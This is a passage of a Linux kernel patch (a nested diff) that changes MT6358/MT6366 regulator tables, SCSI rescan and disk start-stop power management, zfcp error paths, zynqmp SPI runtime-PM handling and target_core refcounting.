++	.disable = regulator_disable_regmap,
++	.is_enabled = regulator_is_enabled_regmap,
++	.get_status = mt6358_get_status,
++};
++
+ static const struct regulator_ops mt6358_volt_table_ops = {
+ 	.list_voltage = regulator_list_voltage_table,
+ 	.map_voltage = regulator_map_voltage_iterate,
+@@ -500,35 +497,23 @@ static const struct regulator_ops mt6358_volt_fixed_ops = {
+ /* The array is indexed by id(MT6358_ID_XXX) */
+ static struct mt6358_regulator_info mt6358_regulators[] = {
+ 	MT6358_BUCK("buck_vdram1", VDRAM1, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f,
+-		    MT6358_VDRAM1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f, MT6358_VDRAM1_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vcore", VCORE, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
+-	MT6358_BUCK("buck_vcore_sshub", VCORE_SSHUB, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_SSHUB_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 1),
+ 	MT6358_BUCK("buck_vpa", VPA, 500000, 3650000, 50000,
+-		    buck_volt_range3, 0x3f, MT6358_BUCK_VPA_DBG0, 0x3f,
+-		    MT6358_VPA_ANA_CON0, 3),
++		    0x3f, MT6358_BUCK_VPA_DBG0, 0x3f, MT6358_VPA_ANA_CON0, 3),
+ 	MT6358_BUCK("buck_vproc11", VPROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 1),
+ 	MT6358_BUCK("buck_vproc12", VPROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 2),
+ 	MT6358_BUCK("buck_vgpu", VGPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 2),
+ 	MT6358_BUCK("buck_vs2", VS2, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VS2_DBG0, 0x7f,
+-		    MT6358_VS2_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS2_DBG0, 0x7f, MT6358_VS2_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vmodem", VMODEM, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f,
+-		    MT6358_VMODEM_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f, MT6358_VMODEM_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vs1", VS1, 1000000, 2587500, 12500,
+-		    buck_volt_range4, 0x7f, MT6358_BUCK_VS1_DBG0, 0x7f,
+-		    MT6358_VS1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS1_DBG0, 0x7f, MT6358_VS1_ANA_CON0, 8),
+ 	MT6358_REG_FIXED("ldo_vrf12", VRF12,
+ 			 MT6358_LDO_VRF12_CON0, 0, 1200000),
+ 	MT6358_REG_FIXED("ldo_vio18", VIO18,
+@@ -582,55 +567,35 @@ static struct mt6358_regulator_info mt6358_regulators[] = {
+ 	MT6358_LDO("ldo_vsim2", VSIM2, vsim_voltages, vsim_idx,
+ 		   MT6358_LDO_VSIM2_CON0, 0, MT6358_VSIM2_ANA_CON0, 0xf00),
+ 	MT6358_LDO1("ldo_vsram_proc11", VSRAM_PROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON0, 0x7f),
++		    MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON0, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_others", VSRAM_OTHERS, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON2, 0x7f),
+-	MT6358_LDO1("ldo_vsram_others_sshub", VSRAM_OTHERS_SSHUB, 500000,
+-		    1293750, 6250, buck_volt_range1,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON2, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_gpu", VSRAM_GPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON3, 0x7f),
++		    MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON3, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_proc12", VSRAM_PROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON1, 0x7f),
+ };
+ 
+ /* The array is indexed by id(MT6366_ID_XXX) */
+ static struct mt6358_regulator_info mt6366_regulators[] = {
+ 	MT6366_BUCK("buck_vdram1", VDRAM1, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f,
+-		    MT6358_VDRAM1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f, MT6358_VDRAM1_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vcore", VCORE, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
+-	MT6366_BUCK("buck_vcore_sshub", VCORE_SSHUB, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_SSHUB_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 1),
+ 	MT6366_BUCK("buck_vpa", VPA, 500000, 3650000, 50000,
+-		    buck_volt_range3, 0x3f, MT6358_BUCK_VPA_DBG0, 0x3f,
+-		    MT6358_VPA_ANA_CON0, 3),
++		    0x3f, MT6358_BUCK_VPA_DBG0, 0x3f, MT6358_VPA_ANA_CON0, 3),
+ 	MT6366_BUCK("buck_vproc11", VPROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 1),
+ 	MT6366_BUCK("buck_vproc12", VPROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 2),
+ 	MT6366_BUCK("buck_vgpu", VGPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 2),
+ 	MT6366_BUCK("buck_vs2", VS2, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VS2_DBG0, 0x7f,
+-		    MT6358_VS2_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS2_DBG0, 0x7f, MT6358_VS2_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vmodem", VMODEM, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f,
+-		    MT6358_VMODEM_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f, MT6358_VMODEM_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vs1", VS1, 1000000, 2587500, 12500,
+-		    buck_volt_range4, 0x7f, MT6358_BUCK_VS1_DBG0, 0x7f,
+-		    MT6358_VS1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS1_DBG0, 0x7f, MT6358_VS1_ANA_CON0, 8),
+ 	MT6366_REG_FIXED("ldo_vrf12", VRF12,
+ 			 MT6358_LDO_VRF12_CON0, 0, 1200000),
+ 	MT6366_REG_FIXED("ldo_vio18", VIO18,
+@@ -673,21 +638,13 @@ static struct mt6358_regulator_info mt6366_regulators[] = {
+ 	MT6366_LDO("ldo_vsim2", VSIM2, vsim_voltages, vsim_idx,
+ 		   MT6358_LDO_VSIM2_CON0, 0, MT6358_VSIM2_ANA_CON0, 0xf00),
+ 	MT6366_LDO1("ldo_vsram_proc11", VSRAM_PROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON0, 0x7f),
++		    MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON0, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_others", VSRAM_OTHERS, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON2, 0x7f),
+-	MT6366_LDO1("ldo_vsram_others_sshub", VSRAM_OTHERS_SSHUB, 500000,
+-		    1293750, 6250, buck_volt_range1,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON2, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_gpu", VSRAM_GPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON3, 0x7f),
++		    MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON3, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_proc12", VSRAM_PROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON1, 0x7f),
+ };
+ 
+ static int mt6358_regulator_probe(struct platform_device *pdev)
+diff --git a/drivers/s390/scsi/zfcp_aux.c b/drivers/s390/scsi/zfcp_aux.c
+index df782646e856f..ab2f35bc294da 100644
+--- a/drivers/s390/scsi/zfcp_aux.c
++++ b/drivers/s390/scsi/zfcp_aux.c
+@@ -518,12 +518,12 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 	if (port) {
+ 		put_device(&port->dev);
+ 		retval = -EEXIST;
+-		goto err_out;
++		goto err_put;
+ 	}
+ 
+ 	port = kzalloc(sizeof(struct zfcp_port), GFP_KERNEL);
+ 	if (!port)
+-		goto err_out;
++		goto err_put;
+ 
+ 	rwlock_init(&port->unit_list_lock);
+ 	INIT_LIST_HEAD(&port->unit_list);
+@@ -546,7 +546,7 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 
+ 	if (dev_set_name(&port->dev, "0x%016llx", (unsigned long long)wwpn)) {
+ 		kfree(port);
+-		goto err_out;
++		goto err_put;
+ 	}
+ 	retval = -EINVAL;
+ 
+@@ -563,7 +563,8 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 
+ 	return port;
+ 
+-err_out:
++err_put:
+ 	zfcp_ccw_adapter_put(adapter);
++err_out:
+ 	return ERR_PTR(retval);
+ }
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index 3f062e4013ab6..013a9a334972e 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -1451,7 +1451,7 @@ retry_next:
+ #endif
+ 				break;
+ 			}
+-			scsi_rescan_device(&device->sdev_gendev);
++			scsi_rescan_device(device);
+ 			break;
+ 
+ 		default:
+diff --git a/drivers/scsi/mvumi.c b/drivers/scsi/mvumi.c
+index 05d3ce9b72dba..c4acf65379d20 100644
+--- a/drivers/scsi/mvumi.c
++++ b/drivers/scsi/mvumi.c
+@@ -1500,7 +1500,7 @@ static void mvumi_rescan_devices(struct mvumi_hba *mhba, int id)
+ 
+ 	sdev = scsi_device_lookup(mhba->shost, 0, id, 0);
+ 	if (sdev) {
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 		scsi_device_put(sdev);
+ 	}
+ }
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index fb6e9a7a7f58b..d25e1c2472538 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -2445,7 +2445,7 @@ static void scsi_evt_emit(struct scsi_device *sdev, struct scsi_event *evt)
+ 		envp[idx++] = "SDEV_MEDIA_CHANGE=1";
+ 		break;
+ 	case SDEV_EVT_INQUIRY_CHANGE_REPORTED:
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 		envp[idx++] = "SDEV_UA=INQUIRY_DATA_HAS_CHANGED";
+ 		break;
+ 	case SDEV_EVT_CAPACITY_CHANGE_REPORTED:
+diff --git a/drivers/scsi/scsi_priv.h b/drivers/scsi/scsi_priv.h
+index c52de9a973e46..b14545acb40f5 100644
+--- a/drivers/scsi/scsi_priv.h
++++ b/drivers/scsi/scsi_priv.h
+@@ -132,7 +132,6 @@ extern int scsi_complete_async_scans(void);
+ extern int scsi_scan_host_selected(struct Scsi_Host *, unsigned int,
+ 				   unsigned int, u64, enum scsi_scan_mode);
+ extern void scsi_forget_host(struct Scsi_Host *);
+-extern void scsi_rescan_device(struct device *);
+ 
+ /* scsi_sysctl.c */
+ #ifdef CONFIG_SYSCTL
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index d12f2dcb4040a..ed26c52ed8474 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1611,12 +1611,24 @@ int scsi_add_device(struct Scsi_Host *host, uint channel,
+ }
+ EXPORT_SYMBOL(scsi_add_device);
+ 
+-void scsi_rescan_device(struct device *dev)
++int scsi_rescan_device(struct scsi_device *sdev)
+ {
+-	struct scsi_device *sdev = to_scsi_device(dev);
++	struct device *dev = &sdev->sdev_gendev;
++	int ret = 0;
+ 
+ 	device_lock(dev);
+ 
++	/*
++	 * Bail out if the device is not running. Otherwise, the rescan may
++	 * block waiting for commands to be executed, with us holding the
++	 * device lock. This can result in a potential deadlock in the power
++	 * management core code when system resume is on-going.
++	 */
++	if (sdev->sdev_state != SDEV_RUNNING) {
++		ret = -EWOULDBLOCK;
++		goto unlock;
++	}
++
+ 	scsi_attach_vpd(sdev);
+ 
+ 	if (sdev->handler && sdev->handler->rescan)
+@@ -1629,7 +1641,11 @@ void scsi_rescan_device(struct device *dev)
+ 			drv->rescan(dev);
+ 		module_put(dev->driver->owner);
+ 	}
++
++unlock:
+ 	device_unlock(dev);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(scsi_rescan_device);
+ 
+diff --git a/drivers/scsi/scsi_sysfs.c b/drivers/scsi/scsi_sysfs.c
+index cac7c902cf70a..1f531063d6331 100644
+--- a/drivers/scsi/scsi_sysfs.c
++++ b/drivers/scsi/scsi_sysfs.c
+@@ -762,7 +762,7 @@ static ssize_t
+ store_rescan_field (struct device *dev, struct device_attribute *attr,
+ 		    const char *buf, size_t count)
+ {
+-	scsi_rescan_device(dev);
++	scsi_rescan_device(to_scsi_device(dev));
+ 	return count;
+ }
+ static DEVICE_ATTR(rescan, S_IWUSR, NULL, store_rescan_field);
+@@ -855,7 +855,7 @@ store_state_field(struct device *dev, struct device_attribute *attr,
+ 		 * waiting for pending I/O to finish.
+ 		 */
+ 		blk_mq_run_hw_queues(sdev->request_queue, true);
+-		scsi_rescan_device(dev);
++		scsi_rescan_device(sdev);
+ 	}
+ 
+ 	return ret == 0 ? count : -EINVAL;
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index e934779bf05c8..30184f7b762c1 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -213,18 +213,32 @@ cache_type_store(struct device *dev, struct device_attribute *attr,
+ }
+ 
+ static ssize_t
+-manage_start_stop_show(struct device *dev, struct device_attribute *attr,
+-		       char *buf)
++manage_start_stop_show(struct device *dev,
++		       struct device_attribute *attr, char *buf)
+ {
+ 	struct scsi_disk *sdkp = to_scsi_disk(dev);
+ 	struct scsi_device *sdp = sdkp->device;
+ 
+-	return sprintf(buf, "%u\n", sdp->manage_start_stop);
++	return sysfs_emit(buf, "%u\n",
++			  sdp->manage_system_start_stop &&
++			  sdp->manage_runtime_start_stop);
+ }
++static DEVICE_ATTR_RO(manage_start_stop);
+ 
+ static ssize_t
+-manage_start_stop_store(struct device *dev, struct device_attribute *attr,
+-			const char *buf, size_t count)
++manage_system_start_stop_show(struct device *dev,
++			      struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_system_start_stop);
++}
++
++static ssize_t
++manage_system_start_stop_store(struct device *dev,
++			       struct device_attribute *attr,
++			       const char *buf, size_t count)
+ {
+ 	struct scsi_disk *sdkp = to_scsi_disk(dev);
+ 	struct scsi_device *sdp = sdkp->device;
+@@ -236,11 +250,42 @@ manage_start_stop_store(struct device *dev, struct device_attribute *attr,
+ 	if (kstrtobool(buf, &v))
+ 		return -EINVAL;
+ 
+-	sdp->manage_start_stop = v;
++	sdp->manage_system_start_stop = v;
+ 
+ 	return count;
+ }
+-static DEVICE_ATTR_RW(manage_start_stop);
++static DEVICE_ATTR_RW(manage_system_start_stop);
++
++static ssize_t
++manage_runtime_start_stop_show(struct device *dev,
++			       struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_runtime_start_stop);
++}
++
++static ssize_t
++manage_runtime_start_stop_store(struct device *dev,
++				struct device_attribute *attr,
++				const char *buf, size_t count)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++	bool v;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EACCES;
++
++	if (kstrtobool(buf, &v))
++		return -EINVAL;
++
++	sdp->manage_runtime_start_stop = v;
++
++	return count;
++}
++static DEVICE_ATTR_RW(manage_runtime_start_stop);
+ 
+ static ssize_t
+ allow_restart_show(struct device *dev, struct device_attribute *attr, char *buf)
+@@ -572,6 +617,8 @@ static struct attribute *sd_disk_attrs[] = {
+ 	&dev_attr_FUA.attr,
+ 	&dev_attr_allow_restart.attr,
+ 	&dev_attr_manage_start_stop.attr,
++	&dev_attr_manage_system_start_stop.attr,
++	&dev_attr_manage_runtime_start_stop.attr,
+ 	&dev_attr_protection_type.attr,
+ 	&dev_attr_protection_mode.attr,
+ 	&dev_attr_app_tag_own.attr,
+@@ -3579,7 +3626,8 @@ static int sd_remove(struct device *dev)
+ 
+ 	device_del(&sdkp->disk_dev);
+ 	del_gendisk(sdkp->disk);
+-	sd_shutdown(dev);
++	if (!sdkp->suspended)
++		sd_shutdown(dev);
+ 
+ 	put_disk(sdkp->disk);
+ 	return 0;
+@@ -3652,13 +3700,20 @@ static void sd_shutdown(struct device *dev)
+ 		sd_sync_cache(sdkp, NULL);
+ 	}
+ 
+-	if (system_state != SYSTEM_RESTART && sdkp->device->manage_start_stop) {
++	if (system_state != SYSTEM_RESTART &&
++	    sdkp->device->manage_system_start_stop) {
+ 		sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		sd_start_stop_device(sdkp, 0);
+ 	}
+ }
+ 
+-static int sd_suspend_common(struct device *dev, bool ignore_stop_errors)
++static inline bool sd_do_start_stop(struct scsi_device *sdev, bool runtime)
++{
++	return (sdev->manage_system_start_stop && !runtime) ||
++		(sdev->manage_runtime_start_stop && runtime);
++}
++
++static int sd_suspend_common(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+ 	struct scsi_sense_hdr sshdr;
+@@ -3690,15 +3745,18 @@ static int sd_suspend_common(struct device *dev, bool ignore_stop_errors)
+ 		}
+ 	}
+ 
+-	if (sdkp->device->manage_start_stop) {
++	if (sd_do_start_stop(sdkp->device, runtime)) {
+ 		if (!sdkp->device->silence_suspend)
+ 			sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		/* an error is not worth aborting a system sleep */
+ 		ret = sd_start_stop_device(sdkp, 0);
+-		if (ignore_stop_errors)
++		if (!runtime)
+ 			ret = 0;
+ 	}
+ 
++	if (!ret)
++		sdkp->suspended = true;
++
+ 	return ret;
+ }
+ 
+@@ -3707,29 +3765,37 @@ static int sd_suspend_system(struct device *dev)
+ 	if (pm_runtime_suspended(dev))
+ 		return 0;
+ 
+-	return sd_suspend_common(dev, true);
++	return sd_suspend_common(dev, false);
+ }
+ 
+ static int sd_suspend_runtime(struct device *dev)
+ {
+-	return sd_suspend_common(dev, false);
++	return sd_suspend_common(dev, true);
+ }
+ 
+-static int sd_resume(struct device *dev)
++static int sd_resume(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!sdkp)	/* E.g.: runtime resume at the start of sd_probe() */
+ 		return 0;
+ 
+-	if (!sdkp->device->manage_start_stop)
++	if (!sd_do_start_stop(sdkp->device, runtime)) {
++		sdkp->suspended = false;
+ 		return 0;
++	}
+ 
+-	sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
+-	ret = sd_start_stop_device(sdkp, 1);
+-	if (!ret)
++	if (!sdkp->device->no_start_on_resume) {
++		sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
++		ret = sd_start_stop_device(sdkp, 1);
++	}
++
++	if (!ret) {
+ 		opal_unlock_from_suspend(sdkp->opal_dev);
++		sdkp->suspended = false;
++	}
++
+ 	return ret;
+ }
+ 
+@@ -3738,7 +3804,7 @@ static int sd_resume_system(struct device *dev)
+ 	if (pm_runtime_suspended(dev))
+ 		return 0;
+ 
+-	return sd_resume(dev);
++	return sd_resume(dev, false);
+ }
+ 
+ static int sd_resume_runtime(struct device *dev)
+@@ -3762,7 +3828,7 @@ static int sd_resume_runtime(struct device *dev)
+ 				  "Failed to clear sense data\n");
+ 	}
+ 
+-	return sd_resume(dev);
++	return sd_resume(dev, true);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/sd.h b/drivers/scsi/sd.h
+index 5eea762f84d18..409dda5350d10 100644
+--- a/drivers/scsi/sd.h
++++ b/drivers/scsi/sd.h
+@@ -131,6 +131,7 @@ struct scsi_disk {
+ 	u8		provisioning_mode;
+ 	u8		zeroing_mode;
+ 	u8		nr_actuators;		/* Number of actuators */
++	bool		suspended;	/* Disk is suspended (stopped) */
+ 	unsigned	ATO : 1;	/* state of disk ATO bit */
+ 	unsigned	cache_override : 1; /* temp override of WCE,RCD */
+ 	unsigned	WCE : 1;	/* state of disk WCE bit */
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index 9f0f69c1ed665..47d487729635c 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -2278,7 +2278,7 @@ static void pqi_update_device_list(struct pqi_ctrl_info *ctrl_info,
+ 			device->advertised_queue_depth = device->queue_depth;
+ 			scsi_change_queue_depth(device->sdev, device->advertised_queue_depth);
+ 			if (device->rescan) {
+-				scsi_rescan_device(&device->sdev->sdev_gendev);
++				scsi_rescan_device(device->sdev);
+ 				device->rescan = false;
+ 			}
+ 		}
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 7a1dc5c7c49ee..c2d981d5a2dd5 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -471,7 +471,7 @@ static void storvsc_device_scan(struct work_struct *work)
+ 	sdev = scsi_device_lookup(wrk->host, 0, wrk->tgt_id, wrk->lun);
+ 	if (!sdev)
+ 		goto done;
+-	scsi_rescan_device(&sdev->sdev_gendev);
++	scsi_rescan_device(sdev);
+ 	scsi_device_put(sdev);
+ 
+ done:
+diff --git a/drivers/scsi/virtio_scsi.c b/drivers/scsi/virtio_scsi.c
+index 2a79ab16134b1..3f8c553f3d91e 100644
+--- a/drivers/scsi/virtio_scsi.c
++++ b/drivers/scsi/virtio_scsi.c
+@@ -325,7 +325,7 @@ static void virtscsi_handle_param_change(struct virtio_scsi *vscsi,
+ 	/* Handle "Parameters changed", "Mode parameters changed", and
+ 	   "Capacity data has changed".  */
+ 	if (asc == 0x2a && (ascq == 0x00 || ascq == 0x01 || ascq == 0x09))
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 
+ 	scsi_device_put(sdev);
+ }
+diff --git a/drivers/spi/spi-zynqmp-gqspi.c b/drivers/spi/spi-zynqmp-gqspi.c
+index c760aac070e54..3b56d5e7080e1 100644
+--- a/drivers/spi/spi-zynqmp-gqspi.c
++++ b/drivers/spi/spi-zynqmp-gqspi.c
+@@ -1218,9 +1218,9 @@ static int zynqmp_qspi_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ clk_dis_all:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_set_suspended(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
++	pm_runtime_put_noidle(&pdev->dev);
++	pm_runtime_set_suspended(&pdev->dev);
+ 	clk_disable_unprepare(xqspi->refclk);
+ clk_dis_pclk:
+ 	clk_disable_unprepare(xqspi->pclk);
+@@ -1244,11 +1244,15 @@ static int zynqmp_qspi_remove(struct platform_device *pdev)
+ {
+ 	struct zynqmp_qspi *xqspi = platform_get_drvdata(pdev);
+ 
++	pm_runtime_get_sync(&pdev->dev);
++
+ 	zynqmp_gqspi_write(xqspi, GQSPI_EN_OFST, 0x0);
++
++	pm_runtime_disable(&pdev->dev);
++	pm_runtime_put_noidle(&pdev->dev);
++	pm_runtime_set_suspended(&pdev->dev);
+ 	clk_disable_unprepare(xqspi->refclk);
+ 	clk_disable_unprepare(xqspi->pclk);
+-	pm_runtime_set_suspended(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index d21f88de197c7..301fe376a1206 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -883,7 +883,6 @@ sector_t target_to_linux_sector(struct se_device *dev, sector_t lb)
+ EXPORT_SYMBOL(target_to_linux_sector);
+ 
+ struct devices_idr_iter {
+-	struct config_item *prev_item;
+ 	int (*fn)(struct se_device *dev, void *data);
+ 	void *data;
+ };
+@@ -893,11 +892,9 @@ static int target_devices_idr_iter(int id, void *p, void *data)
+ {
+ 	struct devices_idr_iter *iter = data;
+ 	struct se_device *dev = p;
++	struct config_item *item;
+ 	int ret;
+ 
+-	config_item_put(iter->prev_item);
+-	iter->prev_item = NULL;
+-
+ 	/*
+ 	 * We add the device early to the idr, so it can be used
+ 	 * by backend modules during configuration. We do not want
+@@ -907,12 +904,13 @@ static int target_devices_idr_iter(int id, void *p, void *data)
+ 	if (!target_dev_configured(dev))
+ 		return 0;
+ 
+-	iter->prev_item = config_item_get_unless_zero(&dev->dev_group.cg_item);
+-	if (!iter->prev_item)
++	item = config_item_get_unless_zero(&dev->dev_group.cg_item);
++	if (!item)
+ 		return 0;
+ 	mutex_unlock(&device_mutex);
+ 
+ 	ret = iter->fn(dev, iter->data);
++	config_item_put(item);
+ 
+ 	mutex_lock(&device_mutex);
+ 	return ret;
